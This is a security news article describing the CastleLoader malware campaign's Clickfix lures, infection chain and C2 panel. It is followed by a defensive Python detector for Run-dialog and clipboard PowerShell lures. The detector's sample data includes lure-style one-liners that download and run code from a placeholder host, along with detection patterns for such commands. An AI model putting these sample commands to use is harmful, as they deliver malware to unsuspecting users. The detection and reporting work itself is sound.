New CastleLoader Attack Uses Cloudflare-themed Clickfix Method to Compromise Windows Systems

VedVision HeadLines July 25, 2025

A newly identified loader malware dubbed CastleLoader has emerged as a significant threat since early 2025, rapidly evolving into a distribution platform for various information stealers and remote access trojans (RATs).

Leveraging sophisticated phishing tactics under T1566 and drive-by compromise methods classified as T1189, attackers masquerade as legitimate software libraries, online meeting platforms like Google Meet, browser update notifications, or document verification systems through T1036 techniques.

This social engineering ploy tricks victims into executing malicious PowerShell commands (T1059.001) via clipboard manipulation, effectively bypassing traditional security defenses by exploiting user trust.

Over a two-month period starting in May 2025, threat actors deployed CastleLoader across seven distinct command-and-control (C2) servers, recording 1,634 download attempts that resulted in 469 successful infections, a 28.7% conversion rate that highlights the campaign’s efficacy.

Notably, these operations have compromised over 400 critical victims, including U.S. government entities, demonstrating CastleLoader’s targeted reach and potential for widespread damage.

Technical Breakdown of Infection Chain

In the primary distribution vector, CastleLoader employs Cloudflare-themed Clickfix phishing sites that display fake error messages or CAPTCHA prompts, prompting users to copy and paste PowerShell scripts into the Windows Run dialog (T1204.004).

Figure: CastleLoader’s attack chain and distribution mechanism.

According to the Catalyst report, this action triggers a background request to a malicious PHP endpoint, such as /s.php?an=0, which populates the clipboard with obfuscated code.

Upon execution, the script downloads a ZIP archive from a secondary endpoint like /s.php?an=2, extracts it using System.IO.Compression.FileSystem, and runs an AutoIT script (T1059.010) that loads shellcode into memory.

This shellcode resolves hashed DLLs and APIs before establishing C2 communications over web protocols (T1071.001) to fetch additional payloads via T1105 ingress tool transfer.

Depending on the campaign, victims receive secondary malware including StealC, RedLine, NetSupport RAT, DeerStealer, HijackLoader, or SectopRAT, each tailored for credential harvesting, backdoor access, or further loader chaining.

An alternative method involves fake GitHub repositories mimicking tools like SQL Server Management Studio, where malicious executables (T1204.002) directly connect to C2 servers for payload delivery.

Overlaps with DeerStealer campaigns, such as shared HijackLoader samples (e.g., hash aafcf3fc0eb947759e1c97917a6533a4), suggest coordinated efforts among threat actors, enhancing resilience through distributed domains and encrypted Docker containers.

C2 Infrastructure

CastleLoader’s C2 panel, version 1.1 Alpha, operates as a web-based management interface with MaaS-like features, including modules for statistics, visits, installs, delivery, tasks, and campaigns.

Figure: The installs page of the CastleLoader C2 panel.

The installs section collects victim telemetry (T1005) such as IP addresses, user agents, and system details, enabling operators to monitor infections and trigger payload re-execution.

Delivery and tasks modules manage payload uploads, geographic targeting, and execution parameters like anti-VM detection and privilege escalation, while visits tracking analyzes user environments for refined attacks.

Despite its sophistication, CastleLoader has not appeared in underground forum sales, indicating possible in-house development.

This malware’s versatility in deploying stealers for data exfiltration and RATs for persistent access underscores its role in multifaceted cybercriminal operations, with network communications spanning legitimate services to evade attribution.

As of July 2025, the high infection rate and focus on high-value targets emphasize the need for enhanced user awareness training, clipboard monitoring, and behavioral analytics to counter such human-centric threats.
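The infection chain described above (a Run-dialog PowerShell one-liner that fetches from a /s.php?an=N endpoint, evaluates the response in memory, extracts a ZIP with System.IO.Compression.FileSystem and launches AutoIt) and the clipboard-monitoring recommendation both reduce to the same question for a defender: does a given command line, or a block of text the user is about to paste, look like a Clickfix lure? The following Python is an added example, not code from the article or from Catalyst; the regex indicators, weights, threshold of 5 and the sample process events and clipboard strings are all constructed here for illustration, and example.invalid is a placeholder host, not an infrastructure indicator from the campaign. It scores process-creation events (image, parent image, command line, as a Sysmon-style EDR would record them) and raw clipboard text, and treats PowerShell spawned by explorer.exe (the Run dialog's parent) as an extra signal rather than a verdict on its own.

```python
import re
from dataclasses import dataclass, field

# Indicators drawn from the chain the article describes. Patterns and weights
# are this example's own assumptions, not Catalyst's detection logic.
INDICATORS = [
    ("castle_endpoint",   re.compile(r"/s\.php\?an=\d", re.I), 4),
    ("invoke_expression", re.compile(r"\b(iex|invoke-expression)\b", re.I), 3),
    ("web_download",      re.compile(r"(downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bcurl\b)", re.I), 2),
    ("zip_extract",       re.compile(r"System\.IO\.Compression\.FileSystem", re.I), 3),
    ("hidden_window",     re.compile(r"-w(indowstyle)?\s+hidden", re.I), 2),
    ("encoded_command",   re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I), 2),
    ("autoit",            re.compile(r"autoit3?\.exe|\.a3x\b", re.I), 3),
]
RUN_DIALOG_PARENT = "explorer.exe"          # Win+R launches children under explorer.exe
POWERSHELL = ("powershell.exe", "pwsh.exe")
THRESHOLD = 5                               # assumed alerting threshold


@dataclass
class ProcessEvent:
    image: str
    parent_image: str
    command_line: str


@dataclass
class Verdict:
    score: int
    hits: list = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return self.score >= THRESHOLD


def _basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]


def score_text(text: str):
    """Apply every indicator to a string; returns (score, matched indicator names)."""
    score, hits = 0, []
    for name, rx, weight in INDICATORS:
        if rx.search(text):
            score += weight
            hits.append(name)
    return score, hits


def score_clipboard(text: str) -> Verdict:
    """Text-only heuristic for clipboard content, the point at which a Clickfix
    lure hands the user a command to paste."""
    score, hits = score_text(text)
    return Verdict(score, hits)


def score_process(ev: ProcessEvent) -> Verdict:
    """Command-line indicators plus the parent/child relationship the Run dialog produces."""
    score, hits = score_text(ev.command_line)
    if _basename(ev.image) in POWERSHELL and _basename(ev.parent_image) == RUN_DIALOG_PARENT:
        score += 3
        hits.append("powershell_from_run_dialog")
    return Verdict(score, hits)


# Constructed sample telemetry (not real campaign data).
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"C:\Windows\explorer.exe",
                 "powershell -w hidden -c \"iex (iwr 'http://example.invalid/s.php?an=0' -UseBasicParsing).Content\""),
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"C:\Windows\System32\cmd.exe",
                 r"powershell -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"),
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"C:\Windows\explorer.exe",
                 'powershell -Command "Get-ChildItem C:\\Users"'),
]
CLIPBOARD_SAMPLES = [
    # constructed stand-in for Clickfix clipboard content
    ('powershell -w hidden -c "iwr http://example.invalid/s.php?an=2 -o $env:TEMP\\p.zip; '
     'Add-Type -A System.IO.Compression.FileSystem; '
     "[IO.Compression.ZipFile]::ExtractToDirectory('$env:TEMP\\p.zip', $env:TEMP)\""),
    "Meeting link: https://meet.google.com/abc-defg-hij",
]


def main() -> None:
    for ev in SAMPLE_EVENTS:
        v = score_process(ev)
        print(f"process  score={v.score:2d} suspicious={v.suspicious!s:5} hits={v.hits}")
    for text in CLIPBOARD_SAMPLES:
        v = score_clipboard(text)
        print(f"clipboard score={v.score:2d} suspicious={v.suspicious!s:5} hits={v.hits}")


if __name__ == "__main__":
    main()
```

The second sample event shows why the parent process is only a weight and not a rule: an administrator running a script from the Run dialog scores 3 and stays below the threshold, while the lure command scores on the endpoint path, in-memory evaluation, download and hidden window independently of where it was launched, so it still alerts when the same text arrives through the clipboard path that the article recommends monitoring.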
